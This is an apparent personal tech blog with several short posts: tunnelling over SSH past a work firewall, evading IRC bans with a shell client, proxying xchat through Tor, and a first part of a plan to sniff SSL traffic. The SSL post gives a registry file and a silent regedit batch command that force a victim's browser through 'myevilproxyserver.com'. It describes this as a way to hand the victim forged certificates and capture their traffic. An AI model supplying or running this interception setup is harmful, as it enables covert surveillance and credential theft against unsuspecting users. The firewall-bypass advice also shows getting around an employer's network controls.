At work I'm firewalled in, and I'm on a linux server...however they allow traffic over port 22. So it's really easy to get to meebo. You can do this with most sites, however if they require more than one port you'll need a more complex solution.
I fire up cygwin and type this in.(You can use any ssh client though)
ssh -L 8888:meebo.com:80 root@wereboobs.com -N
ssh creates a tunnel from me to wereboobs, which the proxy doesn't care about to meebo which the proxy does(ironic, no?). So now if I type localhost:8888 into my browser I can get to meebo without going through the web proxy. Bonus...the web traffic from meebo is encrypted until it reaches wereboobs.
Thursday, January 13, 2011
Simple Stupid Linux Tricks ssh port forwarding
Thursday, March 5, 2009
The Lazy Hacker Sniffing SSL traffic, maybe part 1:
So this is the first time I am posting, and haven't finished the project, so I am not certain if it works, I'll tell you in part 2. Anyways your probably thinking ssl is encrypted so how are you going to do this. Well we aren't going to break encryption. Instead we are going to send all there traffic to our evil proxy, where it will get any certs from. And our proxy will gobble up the certs it's supposed to get and hand the client machine a cert it made itself. So how are we going to do that, well we need to touch the client computer and do a registry edit. There are lots of languages you can do one in, I am just going to do this one in bat for times sake. It requires one .reg file which should contain:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="myevilproxyserver.com"
And we should name it proxy.reg. And we will make one .bat file which will contain:
regedit.exe /s proxy.reg
You can also do this with the reg command and a hundred other ways but this is how I did it. Ok so that's all you need to do on the client machine, next week some time I will show you how to build the server that will eat this poor soul's traffic
Sunday, September 7, 2008
Blocked on IRC? Need a quick and dirty solution? Proxy to complicated?
Well, if you have a shell you are in real good shape, particularly one that you can install things on. Enter Pork. Here is a quote from the pork readme:
WHAT IS PORK?
-------------
pork is an ncurses-based AOL instant messenger client. It uses the
OSCAR protocol (the one the windows client uses) to access AIM. Pork
features Perl scripting; an online help system; the ability to
configure nearly all aspects of the program's look-and-feel; an alias
system; and a powerful, fully-configurable key binding system. It
supports being logged in with more than one screen name at the same
time. The default look-and-feel of the client is modeled after the
ircII IRC client. Anyone comfortable using ircII (or any clients
derived from it -- e.g., epic, BitchX, etc.) will feel comfortable using
pork.
pork now supports IRC. The syntax for connecting to an IRC server is
/connect -irc
The look-and-feel of pork is pretty much a complete ripoff of
the the look-and-feel of the excellent mw4.irc script for the epic IRC
client by Amber Adams
_______________________________________
So basically you can ssh into your linux box, install pork, and use it as a pseudo proxy to get around those pesky kick bans.
Oh and if you have been wondering what I have been doing lately I have been trying to keep my flickr up to date, so check it out.
Monday, February 11, 2008
How to Proxy Xchat with Tor on a eeePC
Tor is a proxy to keep you anonymous online.
Xchat is an irc client that let's you chat online.
Here is how to make them work together.
This is for eeePC's with eeeXubuntu. Install both Tor and xchat with either the synaptic package manager or apt-get. After that has been done run tor in a terminal window, if you get an error about how tor may be running twice you need to edit the config file. sudo vi /etc/tor/torrc
Change the port it uses from 9050 to 9051 (only do this if you are having problems). Open xchat...you may have to connect without tor once to get to the settings. When you can hit settings then preferences, under network click network setup. Hostname should be 127.0.0.1 and the port should be 9050 or 9051 if you had to change it. Choose SOCKS5 as your type, and choose Use proxy for: All connections.
If you get an odd error when you try to connect it is because someone behind the node you are exiting in tor has been using that node for naughty things, try disconnecting from tor and then connecting again.
EDIT The reason I had to change the port setting was because tor was already
EDIT started on the machine, if you make the change you will still be fine
EDIT sorry for the technical error.